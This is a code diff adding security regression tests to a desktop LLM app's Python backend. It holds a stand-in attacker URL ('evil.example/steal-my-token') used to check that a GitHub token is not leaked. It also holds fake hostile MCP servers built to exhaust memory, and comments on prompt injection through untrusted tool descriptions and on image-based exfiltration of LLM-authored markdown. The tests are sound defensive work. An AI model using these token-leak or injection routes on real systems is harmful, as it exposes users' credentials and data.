+    monkeypatch.setattr(crash_recovery_module.os, "chmod", lambda path, mode: calls.append((path, mode)))
+
+    install_exception_handlers(tmp_path)
+
+    assert (crash_dir(tmp_path) / "faulthandler.log", 0o600) in calls
+
+
+def test_rotating_handler_chmods_the_freshly_rotated_file_on_posix(tmp_path, monkeypatch):
+    # Rotation renames the current log down the chain and then reopens a
+    # BRAND NEW file at the original path via the stdlib's unguarded open() -
+    # that reopened file is what needs a fresh chmod after every rollover,
+    # not just the very first file at handler-construction time.
+    monkeypatch.setattr(crash_recovery_module.sys, "platform", "linux")
+    calls = []
+    monkeypatch.setattr(crash_recovery_module.os, "chmod", lambda path, mode: calls.append((path, mode)))
+
+    target = tmp_path / "graphlink.log"
+    handler = crash_recovery_module._Chmod0600RotatingFileHandler(
+        target, maxBytes=1024, backupCount=3, encoding="utf-8",
+    )
+    try:
+        calls.clear()  # only the rollover's own chmod matters here, not construction's
+        handler.doRollover()
+        assert (target, 0o600) in calls
+    finally:
+        handler.close()
+
+
+@POSIX_ONLY
+def test_the_real_log_file_is_actually_0600_on_posix(tmp_path, isolated_logging_state):
+    configure_logging(tmp_path)
+    assert stat.S_IMODE(log_path(tmp_path).stat().st_mode) == 0o600
+
+
+@POSIX_ONLY
+def test_the_real_faulthandler_log_is_actually_0600_on_posix(tmp_path, isolated_exception_handler_state):
+    install_exception_handlers(tmp_path)
+    assert stat.S_IMODE((crash_dir(tmp_path) / "faulthandler.log").stat().st_mode) == 0o600

--- a/backend/tests/test_gitlink_domain.py
+++ b/backend/tests/test_gitlink_domain.py
@@ -130,6 +130,49 @@ def test_build_headers_includes_bearer_token_when_present():
     assert headers["Authorization"] == "Bearer ghp_xyz"
 
 
+# -- SECURITY-FIX: the token must never be attached to a request whose URL
+# -- names a host outside the real GitHub API/content hosts - see
+# -- _ALLOWED_TOKEN_HOSTS' own comment in github_client.py.
+
+
+def test_build_headers_omits_the_token_for_a_non_github_host():
+    client = GitHubRestClient(settings_manager=_FakeSettingsManagerWithToken("ghp_xyz"))
+    headers = client.build_headers("https://evil.example/x")
+    assert "Authorization" not in headers
+
+
+def test_build_headers_includes_the_token_for_the_api_host():
+    client = GitHubRestClient(settings_manager=_FakeSettingsManagerWithToken("ghp_xyz"))
+    headers = client.build_headers("https://api.github.com/repos/o/r")
+    assert headers["Authorization"] == "Bearer ghp_xyz"
+
+
+def test_build_headers_includes_the_token_for_the_raw_content_host():
+    client = GitHubRestClient(settings_manager=_FakeSettingsManagerWithToken("ghp_xyz"))
+    headers = client.build_headers("https://raw.githubusercontent.com/o/r/main/f.txt")
+    assert headers["Authorization"] == "Bearer ghp_xyz"
+
+
+def test_request_does_not_leak_the_token_to_a_download_url_naming_a_hostile_host(monkeypatch):
+    # Reproduces the actual reported mechanism: fetch_github_file_text hands
+    # a response-supplied download_url straight to request() - a tampered/
+    # hostile GitHub API response naming an attacker host must not receive
+    # the saved token.
+    captured = {}
+
+    def fake_get(url, headers=None, params=None, timeout=None):
+        captured.update(url=url, headers=headers)
+        return _FakeHTTPResponse(status_code=200, content=b"file bytes")
+
+    monkeypatch.setattr(github_client_module.requests, "get", fake_get)
+    client = GitHubRestClient(settings_manager=_FakeSettingsManagerWithToken("ghp_secret"))
+
+    client.request("https://evil.example/steal-my-token", expect_json=False)
+
+    assert captured["url"] == "https://evil.example/steal-my-token"
+    assert "Authorization" not in captured["headers"]
+
+
 def test_request_success_returns_parsed_json_and_forwards_params_and_timeout(monkeypatch):
     captured = {}
 

--- a/backend/tests/test_http_trust_boundary.py
+++ b/backend/tests/test_http_trust_boundary.py
@@ -295,6 +295,80 @@ def test_the_spa_bootstrap_is_not_gated_by_origin(tmp_path):
 # -- middleware ordering (pins the layering, not just each check alone) -----
 
 
+# -- CSP: img-src (finding markdown-image-exfil) -----------------------------
+
+
+def _spa_client(tmp_path) -> TestClient:
+    # Same fixture shape as test_the_spa_bootstrap_is_not_gated_by_origin
+    # above: a real spa_dir so the `spa()` route's FileResponse branches
+    # (not the "SPA build not found" fallback) are actually exercised.
+    # favicon.ico deliberately sits at the SPA ROOT, not under assets/ - a
+    # file under assets/ is served by the separate `app.mount("/assets",
+    # StaticFiles(...))` mount registered above spa(), never reaching this
+    # route at all, so it would not exercise the branch this file's own
+    # test_a_built_asset_file_also_carries_the_csp needs.
+    spa_dir = tmp_path / "spa"
+    (spa_dir / "assets").mkdir(parents=True)
+    (spa_dir / "index.html").write_text("<html>graphlink</html>", encoding="utf-8")
+    (spa_dir / "assets" / "index.js").write_text("console.log(1)", encoding="utf-8")
+    (spa_dir / "favicon.ico").write_text("fake-icon-bytes", encoding="utf-8")
+    return TestClient(
+        create_app(
+            spa_dir=spa_dir,
+            auth_token=TOKEN,
+            settings_state_file=tmp_path / "session.dat",
+            chat_db_path=tmp_path / "chats.db",
+        ),
+        base_url="http://127.0.0.1",
+        headers={"host": "127.0.0.1"},
+    )
+
+
+def test_the_spa_bootstrap_carries_an_img_src_csp(tmp_path):
+    # backend/app.py's own CONTENT_SECURITY_POLICY docstring for the full
+    # mechanism: an unrestricted <img src> in LLM/web-authored markdown is a
+    # silent, no-click data-exfiltration channel once rendered, since the
+    # SPA document had no CSP at all to constrain which hosts an image may
+    # be fetched from. This pins the header actually reaches the real page
+    # load (GET /, no Origin - the normal top-level navigation case, same
+    # as test_the_spa_bootstrap_is_not_gated_by_origin above).
+    client = _spa_client(tmp_path)
+
+    response = client.get("/")
+
+    assert response.status_code == 200
+    csp = response.headers.get("content-security-policy")
+    assert csp is not None
+    assert "img-src 'self' data:" in csp
+
+
+def test_a_client_side_route_fallback_also_carries_the_csp(tmp_path):
+    # The spa() route's OTHER FileResponse branch (deep-link fallback to
+    # index.html for a path with no matching build file) - both branches
+    # must carry the header, not just the literal "/" case.
+    client = _spa_client(tmp_path)
+
+    response = client.get("/some/client-side/route")
+
+    assert response.status_code == 200
+    assert "img-src 'self' data:" in response.headers.get("content-security-policy", "")
+
+
+def test_a_built_asset_file_also_carries_the_csp(tmp_path):
+    # The spa() route's OTHER FileResponse branch: an actual on-disk build
+    # file served THROUGH this catch-all itself (not the separate /assets
+    # StaticFiles mount, which is a different route entirely and never
+    # reaches spa()'s own header-attaching code). Setting the header
+    # unconditionally on every response this handler returns, rather than
+    # only on "/", is what makes this branch safe too.
+    client = _spa_client(tmp_path)
+
+    response = client.get("/favicon.ico")
+
+    assert response.status_code == 200
+    assert "img-src 'self' data:" in response.headers.get("content-security-policy", "")
+
+
 def test_a_bad_origin_is_rejected_before_the_token_is_even_checked():
     # Pins the actual, empirically-verified registration order (see
     # backend/app.py's require_loopback_origin docstring): a request wrong

--- a/backend/tests/test_intents_diagnostics.py
+++ b/backend/tests/test_intents_diagnostics.py
@@ -1,0 +1,99 @@
+"""ADR-016 stage 16.4's diagnostics intents (backend/api/intents_diagnostics.py)
+- unit tests against a bare SessionBus/SceneDocument/DiagnosticsState, not the
+full app.py wiring (see backend/tests/test_app_ws.py's own
+test_diagnostics_intents_dispatch_through_the_real_bus for the "wired into
+the real app" round trip; this file covers the module in isolation, in
+particular the SECURITY-FIX (OBS-3) 0600 permissioning on the exported
+bundle file).
+"""
+
+from __future__ import annotations
+
+import asyncio
+import stat
+import sys
+from pathlib import Path
+
+import pytest
+
+from backend import crash_recovery
+from backend.api.intents_diagnostics import register_diagnostics_intents
+from backend.diagnostics import DiagnosticsState
+from backend.domain.graph import SceneDocument
+from backend.events import SessionBus
+
+POSIX_ONLY = pytest.mark.skipif(sys.platform == "win32", reason="POSIX chmod semantics only apply on POSIX")
+
+
+def _make_bus() -> tuple[SessionBus, DiagnosticsState]:
+    diagnostics_state = DiagnosticsState()
+    bus = SessionBus("test")
+    bus.register_topic("diagnostics", diagnostics_state.payload)
+    document = SceneDocument()
+    register_diagnostics_intents(bus, document, diagnostics_state)
+    return bus, diagnostics_state
+
+
+def test_export_diagnostic_bundle_writes_a_bundle_file(tmp_path, monkeypatch):
+    monkeypatch.setattr(crash_recovery, "_data_dir", lambda *args, **kwargs: tmp_path)
+    bus, _diagnostics_state = _make_bus()
+
+    result = asyncio.run(bus.dispatch_intent("diagnostics", "exportDiagnosticBundle", []))
+
+    written_path = Path(result["path"])
+    assert written_path.exists()
+    assert written_path.parent == tmp_path / "diagnostics"
+
+
+# -- SECURITY-FIX (OBS-3): 0600 permissions on the exported bundle file -----
+
+
+def test_export_diagnostic_bundle_chmods_the_file_to_0600_on_posix(tmp_path, monkeypatch):
+    monkeypatch.setattr(crash_recovery, "_data_dir", lambda *args, **kwargs: tmp_path)
+    monkeypatch.setattr(crash_recovery.sys, "platform", "linux")
+    calls = []
+    monkeypatch.setattr(crash_recovery.os, "chmod", lambda path, mode: calls.append((path, mode)))
+    bus, _diagnostics_state = _make_bus()
+
+    result = asyncio.run(bus.dispatch_intent("diagnostics", "exportDiagnosticBundle", []))
+
+    written_path = Path(result["path"])
+    assert (written_path, 0o600) in calls
+
+
+def test_export_diagnostic_bundle_does_not_chmod_on_windows(tmp_path, monkeypatch):
+    monkeypatch.setattr(crash_recovery, "_data_dir", lambda *args, **kwargs: tmp_path)
+    monkeypatch.setattr(crash_recovery.sys, "platform", "win32")
+    calls = []
+    monkeypatch.setattr(crash_recovery.os, "chmod", lambda path, mode: calls.append((path, mode)))
+    bus, _diagnostics_state = _make_bus()
+
+    asyncio.run(bus.dispatch_intent("diagnostics", "exportDiagnosticBundle", []))
+
+    assert calls == []
+
+
+def test_export_diagnostic_bundle_chmod_failure_is_logged_and_swallowed_not_raised(tmp_path, monkeypatch):
+    monkeypatch.setattr(crash_recovery, "_data_dir", lambda *args, **kwargs: tmp_path)
+    monkeypatch.setattr(crash_recovery.sys, "platform", "linux")
+
+    def _boom(path, mode):
+        raise OSError("permission denied")
+
+    monkeypatch.setattr(crash_recovery.os, "chmod", _boom)
+    bus, _diagnostics_state = _make_bus()
+
+    result = asyncio.run(bus.dispatch_intent("diagnostics", "exportDiagnosticBundle", []))  # must not raise
+
+    assert Path(result["path"]).exists()
+
+
+@POSIX_ONLY
+def test_the_real_bundle_file_is_actually_0600_on_posix(tmp_path, monkeypatch):
+    monkeypatch.setattr(crash_recovery, "_data_dir", lambda *args, **kwargs: tmp_path)
+    bus, _diagnostics_state = _make_bus()
+
+    result = asyncio.run(bus.dispatch_intent("diagnostics", "exportDiagnosticBundle", []))
+
+    written_path = Path(result["path"])
+    assert stat.S_IMODE(written_path.stat().st_mode) == 0o600

--- a/backend/tests/test_knowledge_store.py
+++ b/backend/tests/test_knowledge_store.py
@@ -702,6 +702,22 @@ class TestFts5LexicalSearch:
         assert ks.search_chunks(db_path, "") == []
         assert ks.search_chunks(db_path, "???...") == []
 
+    # -- SECURITY-FIX: FTS5 MATCH cost grows quadratically with the number of
+    # -- quoted phrase terms - a 200k-term query measured 93s of CPU on one
+    # -- worker thread, with no length bound on the query text anywhere on
+    # -- its three entry paths. Tests _fts5_match_expression directly (not
+    # -- through search_chunks/a real FTS5 MATCH) so this suite never pays
+    # -- the cost the fix exists to prevent.
+
+    def test_fts5_match_expression_caps_the_term_count(self):
+        huge_query = " ".join(f"term{i}" for i in range(5000))
+        expression = ks._fts5_match_expression(huge_query)
+        term_count = expression.count('"') // 2
+        assert term_count == ks._MAX_FTS5_QUERY_TERMS
+
+    def test_fts5_match_expression_is_unchanged_for_an_ordinary_query(self):
+        assert ks._fts5_match_expression("brown fox") == '"brown" "fox"'
+
     def test_a_query_containing_fts5_operator_syntax_is_treated_as_literal_terms(self, db_path):
         # "OR"/"-"/"*"/quotes are real FTS5 query-syntax operators - a naive
         # MATCH ? with the raw string would either throw a syntax error or

--- a/backend/tests/test_mcp_client.py
+++ b/backend/tests/test_mcp_client.py
@@ -624,3 +624,155 @@ def test_list_tools_tolerates_a_non_list_tools_field(tmp_path):
         assert client.list_tools() == ()
     finally:
         client.close()
+
+
+# -- SECURITY-FIX: unbounded memory/text growth from a hostile server -------
+
+
+def test_call_tool_truncates_an_oversized_result_instead_of_returning_it_whole(tmp_path):
+    """MAX_TOOL_RESULT_CHARS bounds what a tool result hands back to the
+    Builder - unlike every built-in graph tool's own excerpting, this was
+    previously unbounded, letting a hostile/misbehaving server blow the
+    model's context/cost budget with one call."""
+    from backend.mcp_client import MAX_TOOL_RESULT_CHARS
+
+    huge_script = tmp_path / "huge_result_server.py"
+    huge_script.write_text(textwrap.dedent(r'''
+        import json
+        import sys
+
+        def send(message):
+            sys.stdout.write(json.dumps(message) + "\n")
+            sys.stdout.flush()
+
+        for line in sys.stdin:
+            line = line.strip()
+            if not line:
+                continue
+            request = json.loads(line)
+            method = request.get("method")
+            request_id = request.get("id")
+            if method == "initialize":
+                send({"jsonrpc": "2.0", "id": request_id, "result": {
+                    "protocolVersion": "2024-11-05", "capabilities": {"tools": {}},
+                    "serverInfo": {"name": "huge", "version": "0.0.1"},
+                }})
+            elif method == "notifications/initialized":
+                pass
+            elif method == "tools/call":
+                text = "x" * 5_000_000
+                send({"jsonrpc": "2.0", "id": request_id, "result": {
+                    "content": [{"type": "text", "text": text}], "isError": False,
+                }})
+            else:
+                send({"jsonrpc": "2.0", "id": request_id,
+                      "error": {"code": -32601, "message": "unknown method"}})
+    '''), encoding="utf-8")
+    client = McpStdioClient(command=sys.executable, args=(str(huge_script),), timeout=20.0)
+    client.connect()
+    try:
+        result = client.call_tool("anything", {})
+        assert len(result.content) < 5_000_000
+        assert len(result.content) <= MAX_TOOL_RESULT_CHARS + 200
+        assert "truncated" in result.content
+    finally:
+        client.close()
+
+
+def test_read_loop_survives_a_never_terminated_stdout_line_without_deadlocking(tmp_path):
+    """SECURITY-FIX: `for line in process.stdout` used to accumulate an
+    entire line in memory before yielding it, with no bound - a server that
+    writes without ever emitting a newline grows that buffer without limit.
+    The bounded readline() loop must give up on that connection (not hang
+    or crash the reader thread) once the line exceeds the cap by more than
+    the resync budget, and a normal subsequent call must still work if the
+    server recovers."""
+    script = tmp_path / "no_newline_server.py"
+    script.write_text(textwrap.dedent(r'''
+        import json
+        import sys
+
+        def send(message):
+            sys.stdout.write(json.dumps(message) + "\n")
+            sys.stdout.flush()
+
+        for line in sys.stdin:
+            line = line.strip()
+            if not line:
+                continue
+            request = json.loads(line)
+            method = request.get("method")
+            request_id = request.get("id")
+            if method == "initialize":
+                send({"jsonrpc": "2.0", "id": request_id, "result": {
+                    "protocolVersion": "2024-11-05", "capabilities": {"tools": {}},
+                    "serverInfo": {"name": "no-newline", "version": "0.0.1"},
+                }})
+            elif method == "notifications/initialized":
+                pass
+            elif method == "tools/call":
+                # Write far more than the reader's per-read cap, with NO
+                # trailing newline ever - the real attack this closes.
+                sys.stdout.write("x" * 50_000_000)
+                sys.stdout.flush()
+                # Deliberately never send a real JSON-RPC response.
+            else:
+                send({"jsonrpc": "2.0", "id": request_id,
+                      "error": {"code": -32601, "message": "unknown method"}})
+    '''), encoding="utf-8")
+    client = McpStdioClient(command=sys.executable, args=(str(script),), timeout=20.0)
+    client.connect()
+    try:
+        # The reader gives up resyncing after a bounded number of oversized
+        # reads and stops - reported immediately as a closed connection
+        # rather than making the caller wait out the full timeout.
+        with pytest.raises(McpError, match="closed its output unexpectedly"):
+            client.call_tool("anything", {})
+    finally:
+        client.close()  # must not hang
+
+
+def test_call_tool_error_message_is_truncated_not_unbounded(tmp_path):
+    """SECURITY-FIX: an error response's message text flowed straight into
+    McpError with no length bound - a hostile server's error.message could
+    be arbitrarily large, and this text is logged and can reach a
+    user-facing notification."""
+    script = tmp_path / "huge_error_server.py"
+    script.write_text(textwrap.dedent(r'''
+        import json
+        import sys
+
+        def send(message):
+            sys.stdout.write(json.dumps(message) + "\n")
+            sys.stdout.flush()
+
+        for line in sys.stdin:
+            line = line.strip()
+            if not line:
+                continue
+            request = json.loads(line)
+            method = request.get("method")
+            request_id = request.get("id")
+            if method == "initialize":
+                send({"jsonrpc": "2.0", "id": request_id, "result": {
+                    "protocolVersion": "2024-11-05", "capabilities": {"tools": {}},
+                    "serverInfo": {"name": "huge-error", "version": "0.0.1"},
+                }})
+            elif method == "notifications/initialized":
+                pass
+            elif method == "tools/call":
+                send({"jsonrpc": "2.0", "id": request_id,
+                      "error": {"code": -1, "message": "e" * 500_000}})
+            else:
+                send({"jsonrpc": "2.0", "id": request_id,
+                      "error": {"code": -32601, "message": "unknown method"}})
+    '''), encoding="utf-8")
+    client = McpStdioClient(command=sys.executable, args=(str(script),), timeout=20.0)
+    client.connect()
+    try:
+        with pytest.raises(McpError) as excinfo:
+            client.call_tool("anything", {})
+        assert len(str(excinfo.value)) < 3000
+        assert "truncated" in str(excinfo.value)
+    finally:
+        client.close()

--- a/backend/tests/test_mcp_client.py
+++ b/backend/tests/test_mcp_client.py
@@ -11,13 +11,20 @@ through register_mcp_server_tools -> ToolRegistry.invoke end to end.
 from __future__ import annotations
 
 import asyncio
+import json
 import sys
 import textwrap
 import time
 
 import pytest
 
-from backend.mcp_client import McpError, McpServerConfig, McpStdioClient, register_mcp_server_tools
+from backend.mcp_client import (
+    MAX_TOOL_DESCRIPTION_CHARS,
+    McpError,
+    McpServerConfig,
+    McpStdioClient,
+    register_mcp_server_tools,
+)
 from backend.providers import ToolCall
 from backend.tools import RunContext, ToolRegistry
 
@@ -774,5 +781,131 @@ def test_call_tool_error_message_is_truncated_not_unbounded(tmp_path):
             client.call_tool("anything", {})
         assert len(str(excinfo.value)) < 3000
         assert "truncated" in str(excinfo.value)
+    finally:
+        client.close()
+
+
+# -- SECURITY-FIX regression: an untrusted tool description/schema must not
+# -- be forwarded unbounded/untyped into the model's tool definitions -------
+
+
+# A template rather than a fully static script (unlike the fixtures above):
+# the whole point of these tests is an oversized/malformed tools/list
+# payload, which is impractical to hand-write inline - __TOOLS_JSON__ is
+# replaced with json.dumps(...) of the actual tools list per test via plain
+# str.replace (not .format()), so the JSON's own braces need no escaping.
+_HOSTILE_TOOLS_SERVER_TEMPLATE = textwrap.dedent(r'''
+    import json
+    import sys
+
+    def send(message):
+        sys.stdout.write(json.dumps(message) + "\n")
+        sys.stdout.flush()
+
+    TOOLS = __TOOLS_JSON__
+
+    for line in sys.stdin:
+        line = line.strip()
+        if not line:
+            continue
+        request = json.loads(line)
+        method = request.get("method")
+        request_id = request.get("id")
+        if method == "initialize":
+            send({"jsonrpc": "2.0", "id": request_id, "result": {
+                "protocolVersion": "2024-11-05", "capabilities": {"tools": {}},
+                "serverInfo": {"name": "hostile", "version": "0.0.1"},
+            }})
+        elif method == "notifications/initialized":
+            pass
+        elif method == "tools/list":
+            send({"jsonrpc": "2.0", "id": request_id, "result": {"tools": TOOLS}})
+        else:
+            send({"jsonrpc": "2.0", "id": request_id,
+                  "error": {"code": -32601, "message": "unknown method"}})
+''')
+
+_OVERSIZED_DESCRIPTION = "A" * (MAX_TOOL_DESCRIPTION_CHARS + 500)
+_NORMAL_DESCRIPTION = "Reads a file's contents."
+
+
+@pytest.fixture
+def hostile_tools_server(tmp_path):
+    """A fake MCP server (same shape as fake_fs_server above) advertising
+    three deliberately hostile/malformed tools/list entries: one whose
+    description is 500 chars past MAX_TOOL_DESCRIPTION_CHARS - the
+    prompt-injection vector this fix closes, since an untrusted server's
+    description is forwarded verbatim into the model's tool definitions on
+    every Builder turn - one with an ordinary description as a control, and
+    one with a non-dict inputSchema (a plain string, not the JSON Schema
+    object every provider's tool-call translation assumes)."""
+    tools = [
+        {
+            "name": "oversized_description_tool",
+            "description": _OVERSIZED_DESCRIPTION,
+            "inputSchema": {"type": "object"},
+        },
+        {
+            "name": "normal_description_tool",
+            "description": _NORMAL_DESCRIPTION,
+            "inputSchema": {"type": "object"},
+        },
+        {
+            "name": "bogus_schema_tool",
+            "description": "A tool advertising a non-dict inputSchema.",
+            "inputSchema": "not-a-json-schema-object",
+        },
+    ]
+    script_path = tmp_path / "hostile_tools_server.py"
+    script_path.write_text(
+        _HOSTILE_TOOLS_SERVER_TEMPLATE.replace("__TOOLS_JSON__", json.dumps(tools)),
+        encoding="utf-8",
+    )
+    return str(script_path)
+
+
+def test_list_tools_truncates_an_oversized_description(hostile_tools_server):
+    """The prompt-injection vector this closes: a hostile/compromised MCP
+    server's tools/list description used to be forwarded verbatim, with no
+    length cap, straight into the model's tool definitions on every Builder
+    turn - a channel never shown to the user anywhere (no Settings UI lists
+    tool descriptions). Past MAX_TOOL_DESCRIPTION_CHARS it must now be cut
+    with an explicit truncation marker, not silently forwarded whole."""
+    client = McpStdioClient(command=sys.executable, args=(hostile_tools_server,))
+    try:
+        client.connect()
+        specs = {spec.name: spec for spec in client.list_tools()}
+        description = specs["oversized_description_tool"].description
+        assert len(description) < len(_OVERSIZED_DESCRIPTION)
+        assert description.startswith("A" * MAX_TOOL_DESCRIPTION_CHARS)
+        assert "truncated" in description
+        assert "500 more characters omitted" in description
+    finally:
+        client.close()
+
+
+def test_list_tools_leaves_a_normal_length_description_unaffected(hostile_tools_server):
+    """Control for the truncation test above: a description well under the
+    cap must round-trip byte-for-byte, unmarked."""
+    client = McpStdioClient(command=sys.executable, args=(hostile_tools_server,))
+    try:
+        client.connect()
+        specs = {spec.name: spec for spec in client.list_tools()}
+        assert specs["normal_description_tool"].description == _NORMAL_DESCRIPTION
+    finally:
+        client.close()
+
+
+def test_list_tools_falls_back_to_object_schema_for_a_non_dict_input_schema(hostile_tools_server):
+    """Regression: `tool.get("inputSchema") or {...}` only falls back to the
+    safe default when inputSchema is missing/None/falsy - a non-dict but
+    TRUTHY value (a plain string here) was forwarded to ToolSpec as-is
+    instead of degrading the same way a missing one already does, breaking
+    the provider call downstream instead of failing gracefully."""
+    client = McpStdioClient(command=sys.executable, args=(hostile_tools_server,))
+    try:
+        client.connect()
+        specs = {spec.name: spec for spec in client.list_tools()}
+        assert specs["bogus_schema_tool"].input_schema == {"type": "object"}
     finally:
         client.close()

--- a/backend/tests/test_native_dialogs.py
+++ b/backend/tests/test_native_dialogs.py
@@ -8,6 +8,7 @@ create_file_dialog's call signature.
 """
 
 import asyncio
+from concurrent.futures import ThreadPoolExecutor
 
 import webview
 
@@ -144,6 +145,45 @@ def test_pick_save_file_returns_none_when_the_dialog_resolves_to_an_empty_string
     result = asyncio.run(native_dialogs.pick_save_file("Default.graphlink"))
 
     assert result is None
+
+
+def test_dialog_calls_run_on_the_dedicated_executor_not_the_default_one(monkeypatch):
+    # SECURITY-FIX regression (native-dialog-intents-pin-default-executor-threads):
+    # dialogs used to go through asyncio.to_thread, which always runs on the
+    # loop's shared DEFAULT executor - the same pool ~177 other to_thread call
+    # sites depend on. Confirms run_in_executor is now called with the
+    # module's own _DIALOG_EXECUTOR (not None, which asyncio.to_thread would
+    # pass to mean "use the default executor").
+    fake = _FakeWindow(return_value=("C:/models/a.gguf",))
+    monkeypatch.setattr(webview, "windows", [fake])
+
+    seen_executors = []
+
+    async def run():
+        loop = asyncio.get_running_loop()
+        real_run_in_executor = loop.run_in_executor
+
+        def recording_run_in_executor(executor, func, *args):
+            seen_executors.append(executor)
+            return real_run_in_executor(executor, func, *args)
+
+        monkeypatch.setattr(loop, "run_in_executor", recording_run_in_executor)
+        return await native_dialogs.pick_file(file_types=("GGUF files (*.gguf)",))
+
+    result = asyncio.run(run())
+
+    assert result == "C:/models/a.gguf"
+    assert seen_executors == [native_dialogs._DIALOG_EXECUTOR]
+    assert seen_executors[0] is not None
+
+
+def test_dialog_executor_is_a_small_dedicated_pool_distinct_from_the_default_executor():
+    # The whole fix is that this is NOT the same object asyncio.to_thread(...)
+    # would use (None -> the loop's shared default ThreadPoolExecutor) - a
+    # dedicated, small pool keeps a stuck/open dialog from wedging the ~177
+    # other to_thread call sites across the backend that share the default one.
+    assert isinstance(native_dialogs._DIALOG_EXECUTOR, ThreadPoolExecutor)
+    assert native_dialogs._DIALOG_EXECUTOR._max_workers == 4
 
 
 def test_uses_the_first_window_when_multiple_exist():

--- a/backend/tests/test_observability.py
+++ b/backend/tests/test_observability.py
@@ -8,7 +8,7 @@ import logging
 
 import pytest
 
-from backend.observability import JsonLogFormatter, apply_log_level
+from backend.observability import JsonLogFormatter, apply_log_level, resolve_log_level
 
 
 def _make_record(msg="hello", level=logging.INFO, extra=None):
@@ -86,3 +86,37 @@ def test_apply_log_level_is_a_silent_noop_for_an_unrecognized_name(isolated_root
     logging.getLogger().setLevel(logging.WARNING)
     apply_log_level("NOT_A_REAL_LEVEL")  # must not raise
     assert logging.getLogger().level == logging.WARNING
+
+
+# -- SECURITY-FIX: resolve_log_level must never raise on a hostile/corrupted
+# -- persisted log_level - graphlink_desktop.py's boot path has no handler or
+# -- exception-handler installed yet, so a raise here crashed every launch. --
+
+
+def test_resolve_log_level_maps_every_real_level_name():
+    assert resolve_log_level("DEBUG") == logging.DEBUG
+    assert resolve_log_level("INFO") == logging.INFO
+    assert resolve_log_level("WARNING") == logging.WARNING
+    assert resolve_log_level("ERROR") == logging.ERROR
+
+
+def test_resolve_log_level_falls_back_to_default_for_an_unrecognized_name():
+    # Naming a real logging-module attribute that isn't a level (the actual
+    # reported crash: getattr(logging, "shutdown", INFO) returns the
+    # shutdown FUNCTION, which setLevel then rejects with TypeError).
+    assert resolve_log_level("shutdown") == logging.INFO
+    assert resolve_log_level("Formatter") == logging.INFO
+    assert resolve_log_level("not_a_real_level") == logging.INFO
+
+
+def test_resolve_log_level_falls_back_to_default_for_a_non_string_value():
+    # A JSON list/int/null read straight off a hand-edited session.dat -
+    # getattr(logging, value, INFO) raises TypeError for these outright,
+    # since the attribute-name argument must be a string.
+    assert resolve_log_level(["DEBUG"]) == logging.INFO
+    assert resolve_log_level(42) == logging.INFO
+    assert resolve_log_level(None) == logging.INFO
+
+
+def test_resolve_log_level_honors_a_custom_default():
+    assert resolve_log_level("nonsense", default=logging.ERROR) == logging.ERROR

--- a/backend/tests/test_observability.py
+++ b/backend/tests/test_observability.py
@@ -70,8 +70,13 @@ def test_format_preserves_non_ascii_text_unescaped():
 def isolated_root_level():
     root_logger = logging.getLogger()
     level_before = root_logger.level
+    third_party_levels_before = {
+        name: logging.getLogger(name).level for name in ("openai", "anthropic")
+    }
     yield
     root_logger.setLevel(level_before)
+    for name, level in third_party_levels_before.items():
+        logging.getLogger(name).setLevel(level)
 
 
 def test_apply_log_level_sets_the_root_logger_level(isolated_root_level):
@@ -120,3 +125,38 @@ def test_resolve_log_level_falls_back_to_default_for_a_non_string_value():
 
 def test_resolve_log_level_honors_a_custom_default():
     assert resolve_log_level("nonsense", default=logging.ERROR) == logging.ERROR
+
+
+def test_apply_log_level_debug_caps_third_party_sdk_loggers_to_info(isolated_root_level):
+    # OBS-1: DEBUG on the root must not cascade into openai/anthropic's own
+    # internal loggers - their _base_client dumps the full request body
+    # (every chat message) at DEBUG, and that would otherwise reach the
+    # rotating file handler via plain logging propagation.
+    apply_log_level("DEBUG")
+    assert logging.getLogger().level == logging.DEBUG
+    assert logging.getLogger("openai").level == logging.INFO
+    assert logging.getLogger("anthropic").level == logging.INFO
+
+
+def test_apply_log_level_debug_still_reaches_the_app_own_loggers(isolated_root_level):
+    # The cap is specific to the third-party SDK logger names - it must not
+    # dampen the app's own debug logging, which has no explicit level of its
+    # own and so inherits the root's effective level like any other logger.
+    apply_log_level("DEBUG")
+    app_logger = logging.getLogger("graphlink.test.some_module")
+    assert app_logger.getEffectiveLevel() == logging.DEBUG
+
+
+def test_apply_log_level_deescalates_third_party_sdk_loggers_after_a_prior_debug_call(
+    isolated_root_level,
+):
+    apply_log_level("DEBUG")
+    assert logging.getLogger("openai").level == logging.INFO
+    assert logging.getLogger("anthropic").level == logging.INFO
+
+    apply_log_level("WARNING")
+    assert logging.getLogger().level == logging.WARNING
+    # Must track the newly requested level, not stay stuck at the INFO cap
+    # left behind by the earlier DEBUG call.
+    assert logging.getLogger("openai").level == logging.WARNING
+    assert logging.getLogger("anthropic").level == logging.WARNING

--- a/backend/tests/test_scratch_dirs.py
+++ b/backend/tests/test_scratch_dirs.py
@@ -106,6 +106,57 @@ class TestPrepareScratchDir:
         assert stat.S_IMODE(target.stat().st_mode) == 0o700
 
 
+# -- SECURITY-FIX (PYC-5): the shared ROOT (path.parent) must be secured
+# -- before a leaf is ever created inside it - a leaf's own 0700 does not
+# -- stop the owner of a pre-existing, attacker-controlled root from
+# -- renaming/symlink-swapping the leaf's directory entry.
+
+
+class TestPrepareScratchDirRootOwnership:
+    def test_a_root_owned_by_another_user_is_refused_not_silently_trusted(self, tmp_path, monkeypatch):
+        monkeypatch.setattr(scratch_dirs.sys, "platform", "linux")
+        root = tmp_path / "shared_root"
+        root.mkdir()
+        real_owner_uid = root.stat().st_uid
+        # Fake THIS process's own uid as different from the root's real
+        # (test-created) owner - equivalent to "a different user
+        # pre-created this root", without needing real root/chown
+        # privileges a test can't have.
+        monkeypatch.setattr(scratch_dirs.os, "getuid", lambda: real_owner_uid + 1, raising=False)
+
+        with pytest.raises(OSError, match="refusing to use scratch root"):
+            scratch_dirs.prepare_scratch_dir(root / "leaf")
+
+        # Nothing was created inside the untrusted root.
+        assert not (root / "leaf").exists()
+
+    def test_a_root_owned_by_this_process_is_used_normally(self, tmp_path, monkeypatch):
+        monkeypatch.setattr(scratch_dirs.sys, "platform", "linux")
+        root = tmp_path / "shared_root"
+        root.mkdir()
+        monkeypatch.setattr(scratch_dirs.os, "getuid", lambda: os.stat(root).st_uid, raising=False)
+
+        scratch_dirs.prepare_scratch_dir(root / "leaf")  # must not raise
+
+        assert (root / "leaf").is_dir()
+
+    def test_getuid_being_unavailable_does_not_raise(self, tmp_path, monkeypatch):
+        # Tolerated the same way as an OSError - see
+        # _ensure_private_scratch_root's own docstring on why (real POSIX
+        # always has getuid; only a hypothetical exotic platform wouldn't).
+        monkeypatch.setattr(scratch_dirs.sys, "platform", "linux")
+
+        def _no_getuid():
